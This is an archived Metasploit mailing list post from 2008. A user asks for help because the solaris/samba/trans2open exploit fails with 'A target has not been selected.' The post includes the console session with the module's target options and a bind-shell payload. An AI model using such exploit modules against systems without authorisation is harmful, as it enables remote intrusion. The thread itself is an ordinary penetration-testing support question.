Metasploit mailing list archives

solaris/samba/trans2open -- Exploit failed: A target has not been selected.


From: mail2arthur at gmail.com (arthur zhang)
Date: Thu, 19 Jun 2008 14:28:42 -0400

Hi All,

I got error with solaris/samba/trans2open (as below). What should I
set for the target. The error returns right after the exploit cmd and
no traffic to the RHOST at all. Thanks.

Arthur

msf exploit(trans2open) > use solaris/samba/trans2open
msf exploit(trans2open) > version
Framework: 3.2-release.5378
Console  : 3.2-release.5532
msf exploit(trans2open) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.15.14.82      yes       The target address
   RPORT  139              yes       The target port


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The local port

msf exploit(trans2open) > exploit

[-] Exploit failed: A target has not been selected.
msf exploit(trans2open) >



Current thread: